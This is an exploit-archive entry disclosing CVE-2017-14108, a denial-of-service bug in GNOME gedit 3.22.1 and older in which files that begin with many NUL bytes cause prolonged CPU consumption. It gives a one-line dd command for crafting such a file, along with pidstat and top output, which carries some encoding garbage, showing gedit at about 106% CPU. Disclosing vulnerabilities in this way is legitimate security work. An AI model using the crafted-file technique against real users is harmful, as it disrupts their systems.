libgedit.a 3.22.1 Denial Of Service



EKU-ID: 6902 CVE: 2017-14108 OSVDB-ID:
Author: Hosein Askari Published: 2017-09-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


whom it may concern,
################

#Title: libgedit.a mishandeling NUL blocks in gedit(GNOME text editor) | Denial of service

#CVE: CVE-2017-14108

#CWE: CWE-400

#Exploit Author: Hosein Askari 

#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit

#Version : All Version (3.22.1 and older version)

#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)

#Date: 02-09-2017

#Category: Application

#Author Mail : hosein.askari@aol.com

#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) for a longtime via a file(less than 100KB) that begins with many '\0' characters.

###############

#sudo echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt

#################

POC:

constantine@constantine:~$ pidstat -h -r -u -v -p 3107

Linux 4.4.0-93-generic (constantine) A A A  U+-U*/UdegU1/UdegU+- A A A  _i686_A A A  (2 CPU)

#A A A A A  TimeA A  UIDA A A A A A  PIDA A A  %usr %systemA  %guestA A  %waitA A A  %CPUA A  CPUA  minflt/sA  majflt/sA A A A  VSZA A A A  RSSA A  %MEM threadsA A  fd-nrA  Command

A 1504280041A  1000A A A A A  3107A A  16.43A A A  0.01A A A  0.00A A A  0.03A A  106.44A A A A  1A A A A  15.53A A A A A  0.00A  121296A A  38804A A  0.95A A A A A A  4A A A A A  18A  gedit

constantine@constantine:~$ top

A  PID USERA A A A A  PRA  NIA A A  VIRTA A A  RESA A A  SHR SA  %CPU %MEMA A A A  TIME+ COMMANDA A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A A  

A 3107 constan+A  20A A  0A  128884A  38492A  28320 R 106.7A  0.9A A  0:17.76 gedit 

#########################
Best Regards

Hosein Askari

Contact : hosein.askari@aol.com